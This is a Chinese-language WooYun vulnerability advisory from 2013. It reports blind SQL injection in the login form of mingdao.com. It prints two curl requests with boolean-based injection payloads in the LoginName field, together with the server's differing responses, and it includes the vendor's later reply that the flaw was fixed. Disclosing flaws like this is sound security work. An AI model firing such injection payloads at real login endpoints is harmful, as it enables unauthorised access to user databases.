当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
明道网站登录页面存在SQL注入漏洞
漏洞作者:
提交时间:
2013-09-16 15:40
修复时间:
2013-10-31 15:41
公开时间:
2013-10-31 15:41
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
5
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2013-09-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

登录页面提交登录表单的用户名字段存在SQL注入漏洞。

详细说明:

登录页面采用JS对输入内容进行验证,但是绕过验证后可以提交SQL注入指令,并有盲注现象。

漏洞证明:

curl "http://www.mingdao.com/ajaxpage/DoLogin.aspx" --data "op=login&LoginName=1'or(1=2)and'1'='1&LoginPwd=123&PID=&IsCookie=false"
{"IsLogin":"false","Status":"100","MSG":"用户名不存在。"}
curl "http://www.mingdao.com/ajaxpage/DoLogin.aspx" --data "op=login&LoginName=1'or(1=1)and'1'='1&LoginPwd=123&PID=&IsCookie=false"
{"IsLogin":"false","Status":"102","MSG":"用户名或密码不正确"}

修复方案:

版权声明:转载请注明来源 路人甲@乌云


>

漏洞回应

厂商回应:

危害等级:暂时无回应

漏洞Rank:0

确认时间:2013-09-16 15:40

厂商回复:

最新状态:

2013-12-10:谢谢提交问题,已经修复!

2013-12-10:前段时间一直关注在产品上面,忽略了认领,经过测试之后,发现并无实质性后果,当然我们也做了些预防的策略。